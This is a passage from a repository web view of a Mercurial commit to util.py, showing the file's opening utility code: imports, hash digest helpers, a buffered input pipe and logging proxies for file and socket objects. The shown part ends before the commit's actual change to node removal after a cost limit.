##// END OF EJS Templates
util: lower water mark when removing nodes after cost limit reached...
Gregory Szorc -
r39606:f296c0b3 default
parent child Browse files
Show More
@@ -1,3978 +1,3988 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # python 2.6 still have deprecation warning enabled by default. We do not want
145 145 # to display anything to standard user so detect if we are running test and
146 146 # only use python deprecation warning in this case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue an python native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % k)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class let us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True is any data is currently buffered
309 309
310 310 This will be used externally a pre-step for polling IO. If there is
311 311 already data then no polling should be set in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapse it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed if a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_info', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the integer bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
